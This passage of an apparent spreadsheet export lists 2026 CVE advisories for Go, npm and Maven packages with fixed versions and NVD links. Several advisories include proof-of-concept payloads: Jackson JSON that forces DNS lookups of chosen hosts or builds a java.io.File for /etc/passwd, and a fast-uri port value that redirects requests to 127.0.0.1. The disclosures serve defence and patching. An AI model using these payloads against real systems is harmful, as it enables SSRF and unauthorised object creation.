Reachability with a plain field (no annotations, no polymorphism, no default typing):
    static class Config { public InetAddress bindHost; public int port; }
    mapper.readValue("{\"bindHost\":\"poc-reach.example\",\"port\":1}", Config.class);
    // -&gt; resolver invoked on "poc-reach.example"
### Impact
An attacker who can influence JSON deserialized into an `InetAddress` target can force the application to perform outbound forward DNS lookups for attacker-chosen hostnames at deserialization time, before any application-level validation. This yields a DNS-based SSRF / OOB primitive: out-of-band exfiltration / interaction via DNS callbacks, and blind probing of whether internal hostnames resolve (internal-host enumeration). This is the same impact class and trust boundary for which CVE-2026-54514 (CVSS 5.3, CWE-918) was assigned to the InetSocketAddress branch. It is a DNS-lookup / blind SSRF primitive, not arbitrary HTTP SSRF or RCE; it does not itself open a socket.
Suggested fix: avoid eager resolution for InetAddress as well — e.g. defer resolution, validate the host string before resolving, or provide an opt-in/opt-out consistent with the InetSocketAddress fix (there is no direct unresolved-InetAddress equivalent, so deferring/validating or documenting the resolution is the practical mitigation).
Credit : Ta Duc Thien</t>
        </is>
      </c>
      <c r="T189" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77310</t>
        </is>
      </c>
    </row>
    <row r="190">
      <c r="A190" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B190" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C190" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77339</t>
        </is>
      </c>
      <c r="D190" s="5" t="inlineStr"/>
      <c r="E190" s="5" t="inlineStr"/>
      <c r="F190" s="5" t="inlineStr"/>
      <c r="G190" s="5" t="inlineStr"/>
      <c r="H190" s="5" t="inlineStr"/>
      <c r="I190" s="5" t="inlineStr"/>
      <c r="J190" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K190" s="5" t="inlineStr"/>
      <c r="L190" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/f1bonacc1/process-compose</t>
        </is>
      </c>
      <c r="M190" s="5" t="inlineStr">
        <is>
          <t>1.120.0</t>
        </is>
      </c>
      <c r="N190" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O190" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P190" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q190" s="5" t="inlineStr"/>
      <c r="R190" s="5" t="inlineStr"/>
      <c r="S190" s="5" t="inlineStr">
        <is>
          <t>Process Compose: Browser DNS rebinding lets websites control local process-compose MCP tools in github.com/f1bonacc1/process-compose</t>
        </is>
      </c>
      <c r="T190" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77339</t>
        </is>
      </c>
    </row>
    <row r="191">
      <c r="A191" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B191" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C191" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-8074</t>
        </is>
      </c>
      <c r="D191" s="5" t="inlineStr"/>
      <c r="E191" s="5" t="inlineStr"/>
      <c r="F191" s="5" t="inlineStr"/>
      <c r="G191" s="5" t="inlineStr"/>
      <c r="H191" s="5" t="inlineStr"/>
      <c r="I191" s="5" t="inlineStr"/>
      <c r="J191" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K191" s="5" t="inlineStr"/>
      <c r="L191" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/mattermost/mattermost-server</t>
        </is>
      </c>
      <c r="M191" s="5" t="inlineStr">
        <is>
          <t>10.11.18+incompatible, 11.7.1+incompatible</t>
        </is>
      </c>
      <c r="N191" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O191" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P191" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q191" s="5" t="inlineStr"/>
      <c r="R191" s="5" t="inlineStr"/>
      <c r="S191" s="5" t="inlineStr">
        <is>
          <t>Mattermost doesn't enforce bot-specific permission checks on the user active status endpoint in github.com/mattermost/mattermost-server</t>
        </is>
      </c>
      <c r="T191" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-8074</t>
        </is>
      </c>
    </row>
    <row r="192">
      <c r="A192" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B192" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C192" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81505</t>
        </is>
      </c>
      <c r="D192" s="5" t="inlineStr"/>
      <c r="E192" s="5" t="inlineStr"/>
      <c r="F192" s="5" t="inlineStr"/>
      <c r="G192" s="5" t="inlineStr"/>
      <c r="H192" s="5" t="inlineStr"/>
      <c r="I192" s="5" t="inlineStr"/>
      <c r="J192" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K192" s="5" t="inlineStr"/>
      <c r="L192" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/frain-dev/convoy</t>
        </is>
      </c>
      <c r="M192" s="5" t="inlineStr">
        <is>
          <t>0.9.3-0.20260724092134-1cc67cd16fb1</t>
        </is>
      </c>
      <c r="N192" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O192" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P192" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q192" s="5" t="inlineStr"/>
      <c r="R192" s="5" t="inlineStr"/>
      <c r="S192" s="5" t="inlineStr">
        <is>
          <t>Convoy: Cross-Tenant Source IDOR Leaks Plaintext Message Broker Credentials in github.com/frain-dev/convoy</t>
        </is>
      </c>
      <c r="T192" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81505</t>
        </is>
      </c>
    </row>
    <row r="193">
      <c r="A193" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B193" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C193" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81871</t>
        </is>
      </c>
      <c r="D193" s="5" t="inlineStr"/>
      <c r="E193" s="5" t="inlineStr"/>
      <c r="F193" s="5" t="inlineStr"/>
      <c r="G193" s="5" t="inlineStr"/>
      <c r="H193" s="5" t="inlineStr"/>
      <c r="I193" s="5" t="inlineStr"/>
      <c r="J193" s="5" t="inlineStr">
        <is>
          <t>go, grpc</t>
        </is>
      </c>
      <c r="K193" s="5" t="inlineStr"/>
      <c r="L193" s="5" t="inlineStr">
        <is>
          <t>Go:go.opentelemetry.io/otel/exporters/otlp/otlplog/otlploggrpc</t>
        </is>
      </c>
      <c r="M193" s="5" t="inlineStr">
        <is>
          <t>0.21.0</t>
        </is>
      </c>
      <c r="N193" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O193" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P193" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q193" s="5" t="inlineStr"/>
      <c r="R193" s="5" t="inlineStr"/>
      <c r="S193" s="5" t="inlineStr">
        <is>
          <t>OpenTelemetry-Go: Log gRPC exporter ignores env TLS certs, bypassing mTLS/pinning in go.opentelemetry.io/otel/exporters/otlp/otlplog/otlploggrpc</t>
        </is>
      </c>
      <c r="T193" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81871</t>
        </is>
      </c>
    </row>
    <row r="194">
      <c r="A194" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B194" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C194" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82399</t>
        </is>
      </c>
      <c r="D194" s="5" t="inlineStr"/>
      <c r="E194" s="5" t="inlineStr"/>
      <c r="F194" s="5" t="inlineStr"/>
      <c r="G194" s="5" t="inlineStr"/>
      <c r="H194" s="5" t="inlineStr"/>
      <c r="I194" s="5" t="inlineStr"/>
      <c r="J194" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K194" s="5" t="inlineStr"/>
      <c r="L194" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/coredns/coredns</t>
        </is>
      </c>
      <c r="M194" s="5" t="inlineStr">
        <is>
          <t>1.14.7</t>
        </is>
      </c>
      <c r="N194" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O194" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P194" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q194" s="5" t="inlineStr"/>
      <c r="R194" s="5" t="inlineStr"/>
      <c r="S194" s="5" t="inlineStr">
        <is>
          <t>CoreDNS: Unauthenticated memory exhaustion in custom transports in github.com/coredns/coredns</t>
        </is>
      </c>
      <c r="T194" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82399</t>
        </is>
      </c>
    </row>
    <row r="195">
      <c r="A195" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B195" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C195" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83557</t>
        </is>
      </c>
      <c r="D195" s="5" t="inlineStr"/>
      <c r="E195" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F195" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G195" s="5" t="inlineStr"/>
      <c r="H195" s="5" t="inlineStr"/>
      <c r="I195" s="5" t="inlineStr"/>
      <c r="J195" s="5" t="inlineStr">
        <is>
          <t>jackson, jackson-databind, fasterxml, maven</t>
        </is>
      </c>
      <c r="K195" s="5" t="inlineStr"/>
      <c r="L195" s="5" t="inlineStr">
        <is>
          <t>Maven:com.fasterxml.jackson.core:jackson-databind, Maven:tools.jackson.core:jackson-databind</t>
        </is>
      </c>
      <c r="M195" s="5" t="inlineStr">
        <is>
          <t>2.18.10, 2.21.6, 2.22.2, 3.1.6, 3.2.2</t>
        </is>
      </c>
      <c r="N195" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O195" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P195" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q195" s="5" t="inlineStr"/>
      <c r="R195" s="5" t="inlineStr"/>
      <c r="S195" s="5" t="inlineStr">
        <is>
          <t>### Summary
`DefaultBaseTypeLimitingValidator` — the `PolymorphicTypeValidator` used automatically whenever `@JsonTypeInfo` is applied without an explicitly configured custom validator — denies polymorphic resolution only for nine specific "unsafe base types" (`Object`, `Serializable`, `Closeable`, `AutoCloseable`, `Cloneable`, `Runnable`, `java.util.logging.Handler`, `javax.naming.Referenceable`, `javax.sql.DataSource`). Its `isSafeSubType()` returns `true` unconditionally for every other base type. `java.lang.Comparable` is not in that list, despite being implemented by a very large fraction of JDK and application classes — comparable in breadth to `Serializable`, which is denylisted for exactly that reason. An application with an `@JsonTypeInfo`-annotated `Comparable`-typed property, and no custom validator configured, will accept a type identifier for essentially any class implementing `Comparable`.
### Details
**Affected file:** `src/main/java/tools/jackson/databind/jsontype/DefaultBaseTypeLimitingValidator.java`
```java
private final static class UnsafeBaseTypes {
    private final Set&lt;String&gt; UNSAFE = new HashSet&lt;&gt;();
    {
        UNSAFE.add(Object.class.getName());
        UNSAFE.add(java.io.Closeable.class.getName());
        UNSAFE.add(java.io.Serializable.class.getName());
        UNSAFE.add(AutoCloseable.class.getName());
        UNSAFE.add(Cloneable.class.getName());
        UNSAFE.add(Runnable.class.getName());          // [databind#5014]
        UNSAFE.add("java.util.logging.Handler");
        UNSAFE.add("javax.naming.Referenceable");
        UNSAFE.add("javax.sql.DataSource");
        // java.lang.Comparable is NOT present here
    }
}
protected boolean isSafeSubType(DatabindContext ctxt,
        JavaType baseType, JavaType subType) {
    return true;   // unconditional for every base type not in UNSAFE
}
```
The class's own JavaDoc acknowledges the design (*"Note that when using potentially unsafe base type like `java.lang.Object` a custom implementation... is needed"*), so the trade-off of leaving broad base types unrestricted is intentional. The gap is that `Comparable` has the same breadth of implementers as the types this class *does* restrict, and its absence looks like an oversight rather than a deliberate choice — consistent with the ongoing, incremental nature of this list (`Runnable` was added recently for issue #5014).
This is specific to the **default, unconfigured validator** reached via bare `@JsonTypeInfo` usage. Global "Default Typing" via `activateDefaultTyping()` is **not** affected, because that method structurally requires an explicit `PolymorphicTypeValidator` argument — a correctly-configured `BasicPolymorphicTypeValidator` rejects the same payload under `activateDefaultTyping()`.
### PoC
Built entirely from source (jackson-databind + jackson-core + jackson-annotations, `javac`, OpenJDK 21, no third-party gadget libraries, no network access):
**1. Sanity check (benign class, confirms the mechanism fires):**
```java
static class SafeThing implements Comparable&lt;SafeThing&gt; {
    public String name;
    public SafeThing() {}
    public int compareTo(SafeThing o) { return 0; }
}
static class Holder {
    @JsonTypeInfo(use = JsonTypeInfo.Id.CLASS)
    public Comparable&lt;?&gt; value;
}
ObjectMapper mapper = JsonMapper.builder().build();   // no custom PTV
String json = "{\"value\":{\"@class\":\"...SafeThing\",\"name\":\"hello\"}}";
Holder h = mapper.readValue(json, Holder.class);
// RESULT: ACCEPTED, class=...SafeThing
```
**2. Real JDK class substitution:**
```java
String json = "{\"value\":[\"java.io.File\",\"/etc/passwd\"]}";
Holder h = mapper.readValue(json, Holder.class);
// RESULT: ACCEPTED, class=java.io.File value=/etc/passwd
```
**3. Negative control — Default Typing with an explicit custom PTV:**
```java
PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
    .allowIfSubType("PtvGapTest4").build();
ObjectMapper mapper = JsonMapper.builder()
    .activateDefaultTyping(ptv, DefaultTyping.NON_FINAL).build();
// same java.io.File payload
// RESULT: REJECTED - InvalidTypeIdException: "...denied resolution"
```
**Observed output:**
$ java -cp .:build/classes PtvGapTest3
Trying: {"value":["java.io.File","/etc/passwd"]}
ACCEPTED, class=java.io.File value=/etc/passwd
$ java -cp .:build/classes PtvGapTest4
Trying malicious substitution: ["PtvGapTest4$Holder",{"value":["java.io.File","/etc/passwd"]}]
REJECTED - InvalidTypeIdException: Could not resolve type id 'java.io.File' as a
subtype of java.lang.Comparable: Configured PolymorphicTypeValidator denied resolution
### Impact
Any application declaring an `@JsonTypeInfo`-annotated property or class with `Comparable` as its base type, without a separately configured restrictive `PolymorphicTypeValidator`, will accept a type identifier for essentially any class implementing `Comparable`. Concrete impact is demonstrated via `java.io.File`: an attacker can cause construction of a `File` object for an arbitrary, attacker-chosen path. On its own this is a controlled-object-instantiation primitive; if the application later calls path-sensitive or mutating methods on the received value, this becomes a path-traversal-adjacent primitive. 
**Suggested remediation:**
1. Add `java.lang.Comparable` to `UnsafeBaseTypes.UNSAFE`.
2. Audit other broad JDK interfaces (`java.lang.Iterable`, `java.util.EventListener`) for the same gap.
3. Consider a narrower default for `isSafeSubType()` for base types outside the fixed denylist, rather than unconditional `true`.</t>
        </is>
      </c>
      <c r="T195" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83557</t>
        </is>
      </c>
    </row>
    <row r="196">
      <c r="A196" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B196" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C196" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84292</t>
        </is>
      </c>
      <c r="D196" s="5" t="inlineStr"/>
      <c r="E196" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F196" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G196" s="5" t="inlineStr"/>
      <c r="H196" s="5" t="inlineStr"/>
      <c r="I196" s="5" t="inlineStr"/>
      <c r="J196" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K196" s="5" t="inlineStr"/>
      <c r="L196" s="5" t="inlineStr">
        <is>
          <t>npm:fast-uri</t>
        </is>
      </c>
      <c r="M196" s="5" t="inlineStr">
        <is>
          <t>2.4.6, 3.1.7, 4.1.4</t>
        </is>
      </c>
      <c r="N196" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O196" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P196" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q196" s="5" t="inlineStr"/>
      <c r="R196" s="5" t="inlineStr"/>
      <c r="S196" s="5" t="inlineStr">
        <is>
          <t>### Impact
`fast-uri` serializes the `port` component of a URI without validating it. When recomposing the authority, `fast-uri` escapes the userinfo and host components but concatenates the port verbatim, so a `port` value that is not a sequence of digits can inject authority delimiters. For example, serializing a component whose `port` is `@127.0.0.1:8124` produces `http://trusted.example:@127.0.0.1:8124/app`, demoting the intended host to userinfo and pointing the authority at an attacker-controlled host. Both `fast-uri` and Node's `URL` read the result back as the attacker's host with no error, so re-validating the built URI does not catch it.
This affects applications that build URIs from parts and assign untrusted data to the `port` component (for example a fixed host from configuration and a port taken from user input or a service record). The same path is reachable through `serialize()`, `normalize()`, and `equal()` in their object forms. A `port` obtained from `parse()` is always digits and is not affected.
### Patches
This vulnerability has been patched in fast-uri `4.1.4`, `3.1.7`, and `2.4.6`. `recomposeAuthority` now rejects any port that is not `*DIGIT` per RFC 3986. All users should upgrade.
### Workarounds
If upgrading is not immediately possible, validate the `port` value against the RFC 3986 grammar (digits only) before passing a component to `serialize()`, `normalize()`, or `equal()`, and reject anything else, for example `if (!/^\d*$/.test(String(port))) throw new Error('invalid port')`.</t>
        </is>
      </c>
      <c r="T196" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84292</t>
        </is>
      </c>
    </row>
    <row r="197">
      <c r="A197" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B197" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C197" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84394</t>
        </is>
      </c>
      <c r="D197" s="5" t="inlineStr"/>
      <c r="E197" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F197" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G197" s="5" t="inlineStr"/>
      <c r="H197" s="5" t="inlineStr"/>
      <c r="I197" s="5" t="inlineStr"/>
      <c r="J197" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K197" s="5" t="inlineStr"/>
      <c r="L197" s="5" t="inlineStr">
        <is>
          <t>npm:fast-uri</t>
        </is>
      </c>
      <c r="M197" s="5" t="inlineStr">
        <is>
          <t>2.4.6, 3.1.7, 4.1.4</t>
        </is>
      </c>
      <c r="N197" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O197" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P197" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q197" s="5" t="inlineStr"/>
      <c r="R197" s="5" t="inlineStr"/>
      <c r="S197" s="5" t="inlineStr">
        <is>
          <t>### Impact
`fast-uri` accepts a host that contains an unbalanced or misplaced authority bracket (`[` or `]`) without reporting an error. A host that starts with `[` but does not end with `]`, such as `[@127.0.0.1`, is neither validated as an IP literal nor canonicalized as a domain name, so `parse()` returns it as the host with `error` undefined, while Node's `URL` (and `http.get`, `axios`, `got`, and other clients built on it) resolve the same string to `127.0.0.1`. An application that reads `parse().host` to make a host decision (an SSRF denylist, a redirect allowlist, or proxy routing) and then passes the original URL to an HTTP client evaluates its policy against a string that is not the host the request reaches. The same host is carried through `normalize()`, `equal()`, and `resolve()`.
### Patches
This vulnerability has been patched in fast-uri `4.1.4`, `3.1.7`, and `2.4.6`. `parse()` now reports `URI host is malformed.` for any host that contains a bracket but is not a valid `[IPv6]` literal. All users should upgrade.
### Workarounds
If upgrading is not immediately possible, reject any URL whose host contains a `[` or `]` that is not a well-formed IPv6 literal before making a host decision. Clients that fail closed on credential-bearing URLs, such as Node's global `fetch()`, are not affected by the reported vector.</t>
        </is>
      </c>
      <c r="T197" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84394</t>
        </is>
      </c>
    </row>
    <row r="198">
      <c r="A198" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B198" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C198" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85024</t>
        </is>
      </c>
      <c r="D198" s="5" t="inlineStr"/>
      <c r="E198" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F198" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G198" s="5" t="inlineStr"/>
      <c r="H198" s="5" t="inlineStr"/>
      <c r="I198" s="5" t="inlineStr"/>
      <c r="J198" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K198" s="5" t="inlineStr"/>
      <c r="L198" s="5" t="inlineStr">
        <is>
          <t>npm:undici</t>
        </is>
      </c>
      <c r="M198" s="5" t="inlineStr">
        <is>
          <t>6.28.1, 7.29.1, 8.10.2</t>
        </is>
      </c>
      <c r="N198" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O198" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P198" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q198" s="5" t="inlineStr"/>
      <c r="R198" s="5" t="inlineStr"/>
      <c r="S198" s="5" t="inlineStr">
        <is>
          <t>## Impact
undici's WebSocket client (including Node.js's bundled `globalThis.WebSocket`) crashes the entire Node.js process when a remote WebSocket peer sends a permessage-deflate compressed message that crosses the decompressed-payload size limit and then contains a malformed DEFLATE block. In `lib/web/websocket/permessage-deflate.js`, the size-limit cleanup calls `removeAllListeners()` on the internal zlib `InflateRaw`, removing its `error` listener, but leaves the stream running. The inflater then emits a `Z_DATA_ERROR` with no listener attached, which Node.js treats as a fatal unhandled `error` event and terminates the process. Application `error`/`close` handlers on the public WebSocket cannot observe or prevent this, because the failing object is the internal `InflateRaw`.
A malicious or compromised WebSocket server can crash a client with a single connection, unauthenticated and without any application mistake. The attack is asymmetric (about 130 KB on the wire expands past the limit) and can be repeated on reconnect (crash loop).
Affected applications are those using the undici WebSocket client (`new WebSocket(...)`) or Node.js's bundled `globalThis.WebSocket` that can be induced to connect to an attacker-controlled or compromised WebSocket endpoint.
## Patches
Upgrade to undici v6.28.1, v7.29.1 or v8.10.2.
## Workarounds
No workaround is available.</t>
        </is>
      </c>
      <c r="T198" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85024</t>
        </is>
      </c>
    </row>
    <row r="199">
      <c r="A199" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B199" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C199" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86003</t>
        </is>
      </c>
      <c r="D199" s="5" t="inlineStr"/>
      <c r="E199" s="5" t="inlineStr"/>
      <c r="F199" s="5" t="inlineStr"/>
      <c r="G199" s="5" t="inlineStr"/>
      <c r="H199" s="5" t="inlineStr"/>
      <c r="I199" s="5" t="inlineStr"/>
      <c r="J199" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K199" s="5" t="inlineStr"/>
      <c r="L199" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/coredns/coredns</t>
        </is>
      </c>
      <c r="M199" s="5" t="inlineStr">
        <is>
          <t>1.14.7</t>
        </is>
      </c>
      <c r="N199" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O199" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P199" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q199" s="5" t="inlineStr"/>
      <c r="R199" s="5" t="inlineStr"/>
      <c r="S199" s="5" t="inlineStr">
        <is>
          <t>CoreDNS DoH/DoQ/gRPC bypass UPDATE rejection enforced on UDP/TCP in github.com/coredns/coredns</t>
        </is>
      </c>
      <c r="T199" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86003</t>
        </is>
      </c>
    </row>
    <row r="200">
      <c r="A200" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B200" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C200" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86043</t>
        </is>
      </c>
      <c r="D200" s="5" t="inlineStr"/>
      <c r="E200" s="5" t="inlineStr"/>
      <c r="F200" s="5" t="inlineStr"/>
      <c r="G200" s="5" t="inlineStr"/>
      <c r="H200" s="5" t="inlineStr"/>
      <c r="I200" s="5" t="inlineStr"/>
      <c r="J200" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K200" s="5" t="inlineStr"/>
      <c r="L200" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/zalando/skipper</t>
        </is>
      </c>
      <c r="M200" s="5" t="inlineStr">
        <is>
          <t>0.27.37</t>
        </is>
      </c>
      <c r="N200" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O200" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P200" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q200" s="5" t="inlineStr"/>
      <c r="R200" s="5" t="inlineStr"/>
      <c r="S200" s="5" t="inlineStr">
        <is>
          <t>Skipper has OPA body-authz bypass: truncated_body mitigation fails open on chunked/HTTP-2 (incomplete fix GHSA-8qqm-fp2q-v734) in github.com/zalando/skipper</t>
        </is>
      </c>
      <c r="T200" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86043</t>
        </is>
      </c>
    </row>
    <row r="201">
      <c r="A201" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B201" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C201" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87859</t>
        </is>
      </c>
      <c r="D201" s="5" t="inlineStr"/>
      <c r="E201" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F201" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G201" s="5" t="inlineStr"/>
      <c r="H201" s="5" t="inlineStr"/>
      <c r="I201" s="5" t="inlineStr"/>
      <c r="J201" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K201" s="5" t="inlineStr"/>
      <c r="L201" s="5" t="inlineStr">
        <is>
          <t>npm:morgan</t>
        </is>
      </c>
      <c r="M201" s="5" t="inlineStr">
        <is>
          <t>1.12.1</t>
        </is>
      </c>
      <c r="N201" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O201" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P201" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q201" s="5" t="inlineStr"/>
      <c r="R201" s="5" t="inlineStr"/>
      <c r="S201" s="5" t="inlineStr">
        <is>
          <t>### Impact
Morgan writes attacker-controlled request data to the access log. Its escaping (added in 1.11.0 and 1.12.0) neutralizes control characters, the Unicode line separators, and backslash, but not the double quote (`0x22`), which is the field delimiter of the Apache combined log format morgan emits. An attacker who controls a quoted field (`:user-agent`, `:referrer`, the request URL, or the Basic auth `:remote-user`) can inject a double quote to close the field early and forge additional fields in the log record. The `combined`, `common`, and `default` formats, and any custom format that quotes a token, are affected. This is an incomplete fix of CVE-2026-5078 and CVE-2026-15603.
### Patches
Users should upgrade to version 1.12.1.
### Workarounds
Update to version 1.12.1.</t>
        </is>
      </c>
      <c r="T201" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87859</t>
        </is>
      </c>
    </row>
    <row r="202">
